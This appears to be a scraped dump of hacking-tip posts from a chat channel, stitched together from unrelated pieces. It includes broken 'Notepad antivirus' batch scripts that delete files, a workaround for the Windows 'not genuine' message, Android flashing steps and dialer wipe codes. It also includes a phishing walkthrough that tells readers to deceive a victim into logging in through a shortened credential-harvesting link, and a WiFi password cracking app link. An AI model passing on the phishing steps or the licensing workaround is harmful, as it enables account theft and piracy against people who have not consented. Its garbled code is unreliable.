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🤠🤙: How To Create Your Own Antivirus Using Notepad
9 Comments Anti Virus , How to , Notepad , Windows
Create Your Own Antivirus Using Notepad
Anti-malwares have now become very important for every computer. If your computer is with the internet connected then you should have an anti-virus must. Actually, it’s all because of increase in the number of internet users. Nowadays, internet users are increasing very rapidly. So that’s why, malware and spamming link are also increasing together. That’s why, in this situation everybody have anti-malware must.
You know what, Hackers and spammers are busy nowadays. They are trying to do illegal activities and making fools to the internet users. So this is the reason to have an anti-virus. Otherwise, you’re wise and can understand everything.
There are many golden awarded anti-viruses are available. You can download easily their official websites. All of them are reliable and free from any type of malwares. But if you’re not satisfied and wanna create your own anti-malware then it’s possible. Every Windows user can create easily her own anti-malware by using Notepad. So, if you wanna create then follow below steps.
How To Create Your Own Anti-Virus Using Notepad?
Here's a way of creating your own Anti-virus. I already said above Please follow below steps perfectly, otherwise Anti-virus will not work. Hope you guys will enjoy this article and this will be helpful for you.
Now first open your Notepad and paste below code in it.
@echo off
title Antivirus
echo Antivirus
echo created by your name
if exist virus.bat goto infected
cd C:\Windows\system32
if not exist virus.bat goto clean
echo warning virus detected
del virus.bat
goto start
echo System secure!
[07/05 21:34] Blinqz😎🤠🤙: Notepad trick#6
1.Open notepad
2.type in the following @echo off
color cb
title Antivirus
echo ===============
echo [ Batch-Scanner]
echo ===============
echo If There is no message ,You are protected.
set /p a=Enter a batch file to scan:
for /f %%x in (
‘findstr /i /m “virus r.i.p byebye ” %a%.bat’
) do (
if /i %%x equ %a%.bat (
for /f %%z in (
‘findstr /i /b /m “tskill del copy shutdown ipconfig ren reg” %a%.bat’
) do (
if /i %%z equ %a%.bat (
echo Virus Detected!!
del %a%.bat
echo %a%.bat was deleted….
pause >nul
pause >nul
5 Common Mistakes That Fresh Hackers Make
Starting out as a beginner in hacking can be a lot of fun, but there are some common mistakes that most make. If you’re reading this, then you have the unique advantage of avoiding these mistakes when you’re still news. The following five points will tell you what not to do in your journey towards becoming a true hacker.
1. If you see a website offering hacking software or offering to hack email ids for money, avoid them. These websites are nothing but scams and won’t work.
2. A software that claims to hack giants like Google, Facebook, Yahoo and the like is a hoax. There are no such software available. You may get yourself hacked while trying to get these.
3. Don’t use keyloggers and Trojans found as freeware online. These software aren’t meant to be free and you will be giving access to your own computer to another hacker.
4. Programming and scripting languages are very important parts of any hacker’s arsenal. If you plan to use software only then you would also be limited by the software’s functionalities.
5. A good hacker is a good programmer, security expert, developer and good script writer. It is usually not the other way around. You must known this for cross site scripting like P
So, hacking is not simply about making your way into websites and leaving your mark. You have a great set of talents a can also get the best jobs in the industry.
You can find the verification code in the disposable inbox. Enter the code in the verification code field, then click verify code.
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Send the verification code.... ( If that number is not working, skip to the next one)
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How to Fix “This Copy of Windows is Not Genuine” Error
Hope you’ve got a picture about what “this copy of windows is not genuine” error actually. Here we’ve arrived with the core part to fix this genuine error. It will work either you’ve Windows 32 /64-bit version, all you need to do is execute this process as mentioned below.
Step 1:
Go to start menu and search for CMD then you need to run the Command Prompt as administrator. In Windows 8 or later go press Windows Key + S, then enter CMD in the search box and right click on the Command prompt and run it as Administrator. If you’ve administrator access you can to go to the start menu or you can simply Press Win + R keys to open the Run program. Then enter CMD and press enter.
Step 2:
Once you’ve opened the Command prompt with the administrator privatization, then you need to SLMGR -REARM and press enter. then you’ll get a successful message about to restart your computer. Well guys, this command was not working on some Windows 7 versions so you can try this command: SLMGR /REARM.
Step 3:
Then you need to restart your computer to remove windows is not genuine error from your windows computer.
Read: Install Mac OS in Windows PC
If you followed these steps you can easily remove this error in your computer. make sure you’ve followed the steps correctly without skipping them. Enjoy the error-free computer.
Is this error still remain unfixed? Are you getting any of below error?
1. Error 1: This maximum allowed number of rearms has been exceeded. Well, then let’s discuss how to fix this error.
Open Run from Start menu or press Windows button + R.
Now type: regedit.exe
Follow this path now: HKEYLOCALMACHINE -> Software -> Microsoft -> WindowsNT -> Current version -> SoftwareProtectionPlatform.
Now, look for SkipRearm and click on modify, then change it’s value data from 0 to 1.
Restart your computer now.
Now, follow above steps carefully again and this error should be fixed this time. Let’s discuss second case if you haven’t got that above error.
2. Error 2: SLGMR is not recognized as an internal or external command. Well, there are multiple reasons due to which this error generally occurs.
First Reason: Make sure you have pasted SLMGR -REARM command correctly. (Note that there is space betweeb dash and R).
Second Reason: Make sure you have opened Command prompt in Administrator mode. (if not, then from start menu look for Command Prompt, Right click on it and click on Run as Administrator).
Third Reason: There might be any problem with slmgr.vbs file. To fix this error, Open My Computer and Open C Drive now. Click on Windows folder, look for system32 folder and open it. Now, look for slmgr.vbs.REMOVEWAT (Or any extension of slmgr.vbs file). Just, rename this file to slmgr.vbs.
Now, try to follow method 1 again to fix this error again. Well, guys now this windows not genuine error will be removed now but it is not enough (if you are not using original version of Windows).
How to install Android Oreo
You can download the newest available system images in the link below and then flash (install) them to your device. The following section contains the instructions from Google on how to flash a system image.
To flash a system image:
1. Download the appropriate system image for your device below, then unzip it to a safe directory.
2. Connect your device to your computer over USB.
3. Start the device in fastboot mode with one of the following methods:
• Using the adb tool: With the device powered on, execute:
adb reboot bootloader
• Using a key combo: Turn the device off, then turn it on and immediately hold down the relevant key combination for your device.
4. If necessary, unlock the device's bootloader using one of the following methods:
• If you are updating a Nexus 5X or Nexus 6P device using the hammerhead or angler builds, update your fastboot tool to the latest available version (>=23.0.1), and then run this command:
fastboot flashing unlock
• If you are updating an older device, run this command:
fastboot oem unlock
The target device will show you a confirmation screen. (This erases all data on the target device.)
5. Open a terminal and navigate to the unzipped system image directory.
6. Execute the flash-all script. This script installs the necessary bootloader, baseband firmware(s), and operating system.
Once the script finishes, your device reboots. You should now lock the bootloader for security:
1. Start the device in fastboot mode again, as described above.
2. Execute:
fastboot flashing lock
or, for older devices, run:
fastboot oem lock
Locking bootloader will wipe the data on some devices. After locking the bootloader, if you want to flash the device again, you must run fastboot oem unlock again, which will wipe the data.
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Читать полностью…Which Programming Language Is Good For A Starter?
Nope I am not going to tell you that. I will just tell you about the purpose of each and then will help you choose.
So here are some popular programming languages:
1. JAVA:
More than 85% android apps are created using JAVA. It is also used in big (big means big) websites. It is a portable programming language which makes it easy to use on multi platforms.
2. Java Script:
Its a browser/client side language. It makes the webpage more interactive. Like for example when you enter a comment on Facebook then the whole page doesn’t load., just that comment is added. This kind of functionalities are added into webpages with JavaScript. Javascript brought about a revolution in webapps.
3. Assembly Language:
The most low level programming language because its nothing more than machine code written in human readable form. Its hard to write and you need to have deep understanding of computers to use this because you are really talking with it. Its very fast in terms of execution.
4. C:
Its a low level language too that’s why its fast. It is used to program operating system, computer games and software which need to be fast. It is hard to write but gives you more control of your computer.
5. C++ :
Its C with more features and those features make it more complex.
6. Perl:
A language which was developed to create small scripts easily . Programming in Perl is easy and efficient but the programs are comparatively slower.
7. Python:
Perl was made better and named Python. Its easy, efficient and flexible. You can automate things with python in a go.
8. Ruby:
Its similar to Python but it became popular when they created a web application development framework named Rails which lets developers to write their web application conveniently.
9. HTML and CSS:
HTML and CSS are languages not programming languages because they are just used display things on a website. They do not do any actual processing. HTML is used to create the basic structure of the website and then CSS is used to make it look good.
10. PHP: It is used to process things in a website. It is server-sided language as it doesn’t get executed in user browser, but on the server. It can be used to generate dynamic webpage content.
11. SQL: This is not a programming language. It is used to interact with databases.
This list could be long because there are too many programming language but I introduced you to the popular ones.
So now its time for the question for today,
Which Language Should Be Your First Programming Language?
Well I don’t have the right to choose a programming language for you. So I will suggest you three of them,
1. Getting Started
Learn HTML & CSS. They are easy and will give you a basic idea of how programming works. You will be able to create your own webpages. After HTML you can go with PHP and SQL, so will have a good grasp over web designing and then you can go with python, C or Java. I assure you that PHP, HTML and SQL will be definitely useful in your hacking journey.
2. Understanding Computer And Programming Better
C..The classic C! C is one of the most foundational languages. If you learn C, you will have a deep knowledge of Computers and you will have a greater understanding of programming too, that will make you a better programmer. You will spend most of your time compiling though (just trying to crack a joke).
3. Too Eager To Create Programs?
Python! Python is very easy to learn and you can create a program which does something instead of programming calculators. Well Python doesn’t start you from the basics but with if you know python, you will be able to understand other languages better. One benefit of python is that you don’t need to compile the script to run it, just write one and run it.
So these are three suggested languages that deserve to be your starter and choice is totally yours.
I Chose A Language To Start Now What?
Now you need a resource to learn your desired programming language. It can be a book, a program or an online platform.
If you want to learn web languages (like HTML & CSS, PHP
That's all check out other website which do same
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☑️*#*#4636#*#* Display information about Phone, Battery and Usage statistics
☑️*#*#7780#*#* Restting your phone to factory state-Only deletes application data and applications
☑️*2767*3855# It’s a complete wiping of your mobile also it reinstalls the phones firmware
☑️*#*#34971539#*#* Shows completes information about the camera
☑️*#*#7594#*#* Changing the power button behavior-Enables direct poweroff once the code enabled
☑️*#*#273283*255*663282*#*#* For a quick backup to all your media files
☑️*#*#197328640#*#* Enabling test mode for service activity
☑️*#*#232339#*#* OR *#*#526#*#*
Wireless Lan Tests
☑️*#*#232338#*#* Displays Wi-Fi Mac-address
☑️*#*#1472365#*#* For a quick GPS test
☑️*#*#1575#*#* A Different type GPS test
☑️*#*#0283#*#* Packet Loopback test
☑️*#*#0*#*#* LCD display test
☑️*#*#0673#*#* OR *#*#0289#*#*
Audio test
☑️*#*#0842#*#* Vibration and Backlight test
☑️*#*#2663#*#* Displays touch-screen version
☑️*#*#2664#*#* Touch-Screen test
☑️*#*#0588#*#* Proximity sensor test
☑️*#*#3264#*#* Ram version
☑️*#*#232331#*#* Bluetooth test
☑️*#*#7262626#*#* Field test
☑️*#*#232337#*# Displays bluetooth device address
☑️*#*#8255#*#* For Google Talk service monitoring
☑️*#*#4986*2650468#*#* PDA, Phone, Hardware, RF Call Date firmware info
☑️*#*#1234#*#* PDA and Phone firmware info
☑️*#*#1111#*#* FTA Software version
☑️*#*#2222#*#* FTA Hardware verion
☑️*#*#44336#*#* Displays Build time and change list number
☑️*#06# Displsys IMEI number
☑️*#*#8351#*#* Enables voice dialing logging mode
☑️*#*#8350#*#* Disables voice dialing logging mode
☑️##778 (+call) Brings up Epst menu
You can now run multiple release channels of Chrome side-by-side on Windows
1. Visit this link and create an account there http://linkshrink.net/7ScUHf
2. Login there and locate the type of page to show to your victim when you give him/her the link
3. Deceive her to login. I will post some confusing sentences so that u copy and use it.
4. When he or she login she will see blank page, then come back to the site u got the link from and click on MY VICTIMS.
5. VOlaa you will see the user name,password,ip adress etc
6.Just copy the user name and password and click here http://linkshrink.net/7ufU9e and use that to login to the account.
WIBR+ - WiFi Hacking Tool For Android
WIBR+ is an android app that is capable of cracking WiFi passwords. It was designed to test the security of the WPA/WPA2 PSK WiFi networks, but now it is widely being used to crack weak WiFi passwords.
It supports two types of attacks -- Dictionary Attacks, and Bruteforce Attacks. It also allows you to use custom dictionaries!
Download link:http://auradesign.cz/android/wibrplus.apk
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